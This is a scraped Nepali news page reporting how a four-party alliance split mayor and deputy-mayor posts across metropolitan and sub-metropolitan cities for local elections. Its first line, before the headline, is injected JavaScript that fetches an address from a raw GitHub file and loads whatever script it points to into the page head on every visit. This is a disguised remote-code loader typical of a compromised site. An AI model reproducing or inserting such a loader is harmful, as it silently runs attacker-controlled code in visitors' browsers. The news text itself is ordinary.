;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); गठबन्धन टुंगियो, महानगर र उपमहानगर मात्र कुन पार्टीलाई कहाँ कहाँ पर्यो भागबन्डा हेर्नुहोस – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • गठबन्धन टुंगियो, महानगर र उपमहानगर मात्र कुन पार्टीलाई कहाँ कहाँ पर्यो भागबन्डा हेर्नुहोस
Breaking News

गठबन्धन टुंगियो, महानगर र उपमहानगर मात्र कुन पार्टीलाई कहाँ कहाँ पर्यो भागबन्डा हेर्नुहोस

जुनेली न्युज, काठमाडौँ | बैसाख ७

आउदो स्थानीय चुनाबको लागि ४ दलले गठबन्धन गरेका छन् |

आज प्रधानमन्त्री तथा नेपालि काँग्रेसका सभापति शेर बहादुर देउवाको अध्यक्षतामा बसेको बैठकले महानगरपालिका उप महानगरपालिकामा कुन दलले प्रमुख र कुन दलले उपप्रमुख पाउने भन्ने टुंगो लागेको छ |

जस अनुसार कांग्रेसले विराटनगर, काठमाडौं र ललितपुरको मेयर तथा वीरगञ्ज, भरतपुर र पोखरा महानगरपालिकाको उपमेयर पद लिनेछ ।

नेकपा माओवादी केन्द्रले भरतपुर महानगरपालिकाको मेयर र ललितपुरको उपमेयर पाउनेछ ।

नेकपा एकीकृत समाजवादीले पाेखरा महानगरपालिकाको मेयर र काठमाडौं महानगरपालिकाको उपमेयर पाउनेछ ।

जनता समाजवादी पार्टीले वीरगञ्जको मेयर र विराटनगरको उपमेयर पाउनेछ ।

उपमहानगरपालिकातर्फ नेपाली कांग्रेसले धरान, इटहरी, कलैया, बुटवल, तुलसीपुर, नेपालगञ्ज, धनगढीको मेयर पद लिनेछ भने जितपुर सिमरा, घोराही र हेटौंडाको उपमेयर लिनेछ ।

नेकपा माओवादी केन्द्रले जितपुर सिमरा र घोराही उपमहानगरपालिकाको मेयर पद लिनेछ भने धरान र धनगढीको उपमेयर लिनेछ ।

नेकपा एकीकृत समाजवादीले हेटौंडा उपमहानगरपालिकाको मेयर पद लिनेछ भने इटहरी, बुटवल र तुलसीपुरको उपमेयर लिनेछ ।

जनता समाजवादी पार्टीले जनकपुर उपमहानगरपालिकाको मेयर र कलैया र नेपालगञ्जको उपमेयर लिनेछ ।

फेसबुक प्रतिक्रियाहरु